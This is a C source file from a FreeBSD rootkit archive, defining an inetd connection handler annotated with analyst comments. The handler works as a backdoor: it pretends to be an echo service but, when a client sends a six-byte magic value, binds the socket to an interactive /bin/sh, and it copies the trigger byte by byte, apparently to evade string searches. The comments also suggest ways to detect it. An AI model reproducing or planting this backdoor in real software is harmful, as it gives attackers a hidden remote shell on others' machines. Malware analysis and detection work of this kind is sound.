fbsdrootkit-1.2/rootkitinetd.h100600 764 764 1021 6273477757 14045 0ustar dfdfvoid rshell_stream(int s, struct servtab *sep) {
	/*
	 * Analyst annotation (the Makefile tail and archive header above are
	 * untouched archive content, not part of this function).
	 *
	 * Connection handler for the connected descriptor `s`; `sep` is not
	 * used in this body. Every chunk read from `s` is written straight
	 * back to `s`, so to an ordinary client it behaves like an echo
	 * service. The one exception: a chunk whose first six bytes equal
	 * ROOTKIT_MAGIC replaces the process with an interactive /bin/sh whose
	 * stdin, stdout and stderr are the socket.
	 *
	 * ROOTKIT_MAGIC and BUFSIZE are defined outside this view.
	 *
	 * NOTE(review): there is no authentication beyond the six-byte value
	 * and no logging call in this body, so detection has to come from
	 * outside this code: an integrity check of the hosting binary against
	 * a baseline kept off the host, or an unexpected `sh` process whose
	 * standard descriptors are a network socket.
	 */
	char buffer[BUFSIZE];
	int i;
	char MAG[7];

	/*
	 * Local copy of the first six bytes of ROOTKIT_MAGIC, NUL-terminated.
	 * NOTE(review): the reason for the byte-by-byte copy is not shown
	 * here; presumably the value does not end up referenced as one
	 * contiguous string, so a plain string search of the built binary may
	 * not find the trigger. TODO confirm against the binary.
	 */
	MAG[0]=ROOTKIT_MAGIC[0];
	MAG[1]=ROOTKIT_MAGIC[1];
	MAG[2]=ROOTKIT_MAGIC[2];
	MAG[3]=ROOTKIT_MAGIC[3];
	MAG[4]=ROOTKIT_MAGIC[4];
	MAG[5]=ROOTKIT_MAGIC[5];
	MAG[6]='\0';

	/* Loop until the peer closes the connection or read() fails. */
	while ((i = read(s, buffer, sizeof(buffer))) > 0) {
		/* Only the start of each chunk is compared: sizeof(MAG)-1 == 6 bytes. */
		if(!strncmp(buffer, MAG, sizeof(MAG)-1)) {
			/* Point descriptors 0, 1 and 2 at the socket. */
			dup2(s, 0);
			dup2(s, 1);
			dup2(s, 2);
			/*
			 * The shell runs with whatever credentials this
			 * process holds at the time of the call.
			 */
			execl("/bin/sh", "sh", "-i", 0);
			/* Reached only if execl() returned, i.e. it failed. */
			close(s);
			break;
		}
		/* Non-matching chunk: echo the i bytes back; stop on write error. */
		if(write(s, buffer, i) < 0)
			break;
	}
	/*
	 * Always terminates the calling process. Presumably this runs in a
	 * per-connection child of the service daemon; the caller is not
	 * visible here.
	 */
	exit(0);
}